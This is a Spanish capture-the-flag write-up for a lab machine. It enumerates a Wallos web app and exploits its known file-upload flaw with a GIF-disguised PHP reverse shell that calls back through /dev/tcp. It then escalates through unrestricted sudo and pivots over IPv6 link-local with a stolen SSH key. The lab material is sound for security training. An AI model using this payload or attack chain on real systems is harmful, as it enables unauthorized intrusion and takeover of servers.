Enumeración
Comenzamos con un escaneo general y específico de puertos con nmap:
❯ sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.13
❯ nmap -sCV -p 22,80 -oN 02-targeted.txt 192.168.1.13
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-10 20:46 -03
Nmap scan report for 192.168.1.13
Host is up (0.00028s latency).
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.4.57 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.57 (Ubuntu)
| http-title: Wallos - Subscription Tracker
|_Requested resource was login.php
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.77 secondsSSH aparece como filtered y la web del puerto 80 es Wallos, un gestor de suscripciones.
Enumeramos directorios con gobuster:
❯ gobuster dir -u 'http://192.168.1.13' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html -r
...
/images (Status: 200) [Size: 2968]
/index.php (Status: 200) [Size: 1924]
/about.php (Status: 200) [Size: 1924]
/login.php (Status: 200) [Size: 1924]
/logos.php (Status: 200) [Size: 1977]
/stats.php (Status: 200) [Size: 1924]
/screenshots (Status: 200) [Size: 1999]
/scripts (Status: 200) [Size: 2313]
/registration.php (Status: 200) [Size: 1924]
/includes (Status: 200) [Size: 3710]
/db (Status: 200) [Size: 932]
/logout.php (Status: 200) [Size: 1924]
/styles (Status: 200) [Size: 1975]
/settings.php (Status: 200) [Size: 1924]
/auth.php (Status: 200) [Size: 0]
/libs (Status: 200) [Size: 937]
...RCE en Wallos (File Upload)
En el login entramos con las credenciales por defecto admin:admin. Una vez dentro, comprobamos la versión del sistema (Wallos v1.11.0) y buscamos vulnerabilidades conocidas:
❯ searchsploit wallos
...
Wallos < 1.11.2 - File Upload RCE | php/webapps/51924.txt
...La vulnerabilidad se explota subiendo una reverse shell como logo de una suscripción y ajustando algunos detalles de la petición: anteponemos la cabecera mágica GIF89a; y cambiamos el Content-Type a image/jpeg para evadir las comprobaciones:
------WebKitFormBoundaryIWPlbo4XOJgqYNs8
Content-Disposition: form-data; name="logo"; filename="pwned.php"
Content-Type: image/jpeg
GIF89a;
<?php
shell_exec("bash -c 'bash -i >& /dev/tcp/192.168.1.7/1234 0>&1'");
?>Obtenemos el mensaje de éxito y accedemos a la ruta del logo subido:
{"status":"Success","message":"Subscription added successfully"}❯ ncat -nlvp 1234
Ncat: Version 7.95 ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.1.13:44258.
bash: cannot set terminal process group (214): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/var/www/html/images/uploads/logos$(La ruta del logo en este caso fue http://192.168.1.13/images/uploads/logos/1739232215-pwned.php.)
Escalada a root del contenedor (sudo ALL)
Revisamos sudo -l:
www-data@ubuntu:/home$ sudo -l
Matching Defaults entries for www-data on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User www-data may run the following commands on ubuntu:
(ALL) NOPASSWD: ALLPodemos ejecutar cualquier comando como cualquier usuario y sin contraseña, así que lanzamos una bash de root:
www-data@ubuntu:/home$ sudo bash
root@ubuntu:/home#Obtenemos la primera flag y una id_rsa.
Pivote IPv6 a la máquina interna
Esta máquina es en realidad un contenedor; el SSH real (que nmap veía filtered) está en otra interfaz. Revisamos la tabla de rutas:
root@ubuntu:~# ip route
default via 10.0.3.1 dev eth0 proto static
10.0.3.0/24 dev eth0 proto kernel scope link src 10.0.3.241Como por IPv4 el gateway no nos da SSH accesible, descubrimos al host vecino mediante IPv6 link-local, haciendo ping al multicast ff02::1 (todos los nodos del enlace) desde nuestra interfaz:
root@ubuntu:~/.ssh# nc 10.0.3.1 22 -v
❯ ping -6 -I wlo1 ff02::1
...
64 bytes from fe80::a00:27ff:feca:3aa1%wlo1: icmp_seq=1 ttl=64 time=0.779 ms
...Escaneamos ese host por su dirección link-local:
❯ nmap -6 fe80::a00:27ff:feca:3aa1%wlo1
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-10 22:13 -03
Nmap scan report for fe80::a00:27ff:feca:3aa1
Host is up (0.00019s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 1 IP address (1 host up) scanned in 0.06 secondsY finalmente nos conectamos por SSH con la id_rsa a la máquina interna airbind:
❯ ssh root@fe80::a00:27ff:feca:3aa1%wlo1 -i id_rsa
The authenticity of host 'fe80::a00:27ff:feca:3aa1%wlo1 (fe80::a00:27ff:feca:3aa1%wlo1)' can't be established.
ED25519 key fingerprint is SHA256:La9YyHs4GERVO8XTRRw0cLh6XcInXX35Ar9OiMsXwQk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'fe80::a00:27ff:feca:3aa1%wlo1' (ED25519) to the list of known hosts.
Linux airbind 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@airbind:~#Obtenemos la segunda flag.
Fin.